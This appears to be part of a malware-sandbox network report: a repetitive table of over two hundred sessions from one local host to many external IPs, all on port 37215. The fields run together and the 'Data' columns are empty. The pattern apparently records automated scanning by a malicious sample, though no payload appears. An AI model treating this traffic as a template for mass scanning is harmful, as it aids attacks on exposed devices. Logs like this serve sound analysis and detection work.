                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16059192.168.2.1345654171.228.220.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16060192.168.2.1353104197.101.25.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16061192.168.2.135690041.71.146.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16062192.168.2.1348338157.250.4.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16063192.168.2.1340558157.143.189.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16064192.168.2.1355474197.144.132.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16065192.168.2.134861299.69.246.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16066192.168.2.1344598157.51.17.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16067192.168.2.1360494197.173.186.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16068192.168.2.1357592197.134.34.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16069192.168.2.1358070197.68.47.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16070192.168.2.1352110135.25.99.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16071192.168.2.1336218197.88.8.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16072192.168.2.1345956157.48.232.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16073192.168.2.1349272197.247.19.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16074192.168.2.1337756157.168.195.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16075192.168.2.1348148144.216.35.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16076192.168.2.1355988157.123.102.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16077192.168.2.1336716197.29.231.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16078192.168.2.135485213.130.61.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16079192.168.2.1338474157.195.68.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16080192.168.2.1341692157.248.45.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16081192.168.2.1358292197.250.80.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16082192.168.2.135602041.76.172.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16083192.168.2.1344558197.236.192.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16084192.168.2.1341250197.56.191.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16085192.168.2.1335442157.45.170.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16086192.168.2.134273441.90.135.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16087192.168.2.134988041.206.149.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16088192.168.2.1348876175.119.7.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16089192.168.2.1343942197.244.72.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16090192.168.2.1338820197.183.255.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16091192.168.2.134757041.17.39.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16092192.168.2.135427241.42.65.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16093192.168.2.133304832.154.79.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16094192.168.2.134701041.19.208.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16095192.168.2.133937863.217.214.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16096192.168.2.1340372181.255.90.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16097192.168.2.1357140196.127.12.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16098192.168.2.1346582157.248.244.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16099192.168.2.1338792157.118.10.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16100192.168.2.134777241.192.120.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16101192.168.2.133904841.246.219.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16102192.168.2.1349596157.163.189.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16103192.168.2.1338764197.135.245.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16104192.168.2.1342178197.33.92.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16105192.168.2.1346576189.158.206.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16106192.168.2.133427436.102.82.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16107192.168.2.134775641.79.33.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16108192.168.2.1335536197.32.239.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16109192.168.2.1340814197.254.64.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16110192.168.2.135849817.255.236.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16111192.168.2.133854241.26.94.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16112192.168.2.133747841.51.68.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16113192.168.2.1357306157.182.85.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16114192.168.2.1332888157.80.134.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16115192.168.2.135396075.23.144.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16116192.168.2.1354620157.119.137.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16117192.168.2.135310441.219.18.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16118192.168.2.1347948157.97.2.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16119192.168.2.135734693.104.117.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16120192.168.2.1348234197.112.183.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16121192.168.2.134892267.165.31.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16122192.168.2.1354194136.243.230.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16123192.168.2.134919041.15.145.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16124192.168.2.1336018120.226.191.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16125192.168.2.1337946188.40.38.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16126192.168.2.1348804157.232.110.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16127192.168.2.133629641.75.80.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16128192.168.2.1352510157.134.118.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16129192.168.2.1341782157.136.230.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16130192.168.2.135438841.102.57.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16131192.168.2.134621693.47.128.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16132192.168.2.135030041.42.91.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16133192.168.2.1344982117.22.240.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16134192.168.2.133975239.185.45.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16135192.168.2.134803441.244.85.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16136192.168.2.134821841.201.68.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16137192.168.2.1344060157.183.168.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16138192.168.2.133280641.178.44.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16139192.168.2.1344236197.68.147.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16140192.168.2.1334234197.214.84.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16141192.168.2.1350580201.123.240.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16142192.168.2.133341641.12.23.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16143192.168.2.1350966197.198.234.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16144192.168.2.134749441.193.236.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16145192.168.2.135304641.204.22.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16146192.168.2.1359544197.193.153.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16147192.168.2.1353458157.125.89.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16148192.168.2.1357576128.111.10.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16149192.168.2.1354102197.180.138.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16150192.168.2.133927695.144.56.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16151192.168.2.1360788197.103.43.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16152192.168.2.1360604197.64.141.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16153192.168.2.1358630197.3.49.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16154192.168.2.1347100157.239.147.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16155192.168.2.1356694138.239.174.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16156192.168.2.134272241.113.41.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16157192.168.2.136040852.159.233.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16158192.168.2.1356932197.200.174.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16159192.168.2.133713241.224.169.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16160192.168.2.1341490130.78.36.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16161192.168.2.135860841.29.188.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16162192.168.2.1338754197.85.240.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16163192.168.2.135535641.211.81.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16164192.168.2.13448208.220.31.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16165192.168.2.1337314157.209.252.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16166192.168.2.1341694157.154.10.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16167192.168.2.1357204202.34.177.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16168192.168.2.134117041.35.227.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16169192.168.2.135287841.115.80.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16170192.168.2.135879841.194.236.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16171192.168.2.1334180197.100.151.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16172192.168.2.1355920197.168.188.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16173192.168.2.1342804197.99.146.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16174192.168.2.1344436197.252.50.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16175192.168.2.1351544197.70.228.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16176192.168.2.133997241.146.167.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16177192.168.2.134493042.24.18.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16178192.168.2.1344200157.221.44.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16179192.168.2.1334706163.21.211.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16180192.168.2.134850058.64.126.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16181192.168.2.135085441.240.203.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16182192.168.2.1344266157.232.100.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16183192.168.2.1352752197.72.184.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16184192.168.2.1360664197.155.123.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16185192.168.2.1347262197.53.0.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16186192.168.2.1358072197.251.190.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16187192.168.2.1358756197.79.212.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16188192.168.2.1335728111.217.108.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16189192.168.2.133679081.183.199.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16190192.168.2.1347602157.137.251.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16191192.168.2.1348948155.45.73.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16192192.168.2.1354984187.194.136.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16193192.168.2.1340196197.247.88.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16194192.168.2.134757241.176.61.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16195192.168.2.1360876150.224.237.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16196192.168.2.134099841.223.146.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16197192.168.2.1333520158.253.4.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16198192.168.2.1341094157.110.71.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16199192.168.2.1336128197.117.123.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16200192.168.2.134284241.71.126.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16201192.168.2.135241041.74.2.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16202192.168.2.1337708158.19.199.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16203192.168.2.1341300157.61.20.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16204192.168.2.133505441.159.184.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16205192.168.2.135040841.200.185.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16206192.168.2.1340232197.33.93.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16207192.168.2.1353354152.16.179.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16208192.168.2.134271641.177.124.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16209192.168.2.133627852.97.51.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16210192.168.2.1339122197.147.241.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16211192.168.2.1354962105.70.153.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16212192.168.2.1360792197.84.93.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16213192.168.2.1356948157.205.3.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16214192.168.2.133698818.27.181.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16215192.168.2.1336636197.247.201.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16216192.168.2.1348284171.227.221.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16217192.168.2.1347084157.242.193.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16218192.168.2.1337382157.183.13.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16219192.168.2.1349278157.189.250.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16220192.168.2.1335040157.94.177.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16221192.168.2.1334252131.250.94.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16222192.168.2.135807041.165.62.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16223192.168.2.1353666197.239.235.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16224192.168.2.1339524197.217.13.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16225192.168.2.1352184157.191.91.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16226192.168.2.1360328197.66.93.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16227192.168.2.1336742157.203.164.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16228192.168.2.1358254123.185.34.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16229192.168.2.134686863.25.26.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16230192.168.2.1343072197.70.232.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16231192.168.2.1336434195.79.155.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16232192.168.2.1333256157.217.162.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16233192.168.2.133642247.171.36.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16234192.168.2.1351148197.126.137.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16235192.168.2.133489869.22.40.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16236192.168.2.1346902157.118.232.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16237192.168.2.1342602105.47.209.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16238192.168.2.1346676143.51.160.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16239192.168.2.1343558182.186.81.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16240192.168.2.134575077.93.233.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16241192.168.2.135950041.144.218.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16242192.168.2.1334384197.242.141.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16243192.168.2.1333022157.181.17.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16244192.168.2.1339002157.190.68.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16245192.168.2.1344208128.73.27.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16246192.168.2.134882841.132.137.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16247192.168.2.1345944157.236.211.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16248192.168.2.1336234157.26.39.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16249192.168.2.1358694197.51.119.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16250192.168.2.1339318157.49.55.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16251192.168.2.135272641.43.127.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16252192.168.2.134252441.205.170.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16253192.168.2.134798641.23.166.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16254192.168.2.133639095.202.159.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16255192.168.2.1340598209.60.30.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16256192.168.2.1351874174.233.131.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16257192.168.2.1348794157.22.204.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16258192.168.2.1349854197.34.137.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16259192.168.2.135098441.192.157.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16260192.168.2.1343878157.120.147.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16261192.168.2.1336024157.86.244.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16262192.168.2.1349936157.90.176.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16263192.168.2.1338236157.249.55.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16264192.168.2.134948418.6.255.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16265192.168.2.134182641.79.1.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16266192.168.2.1333984157.190.207.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16267192.168.2.133371641.156.146.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
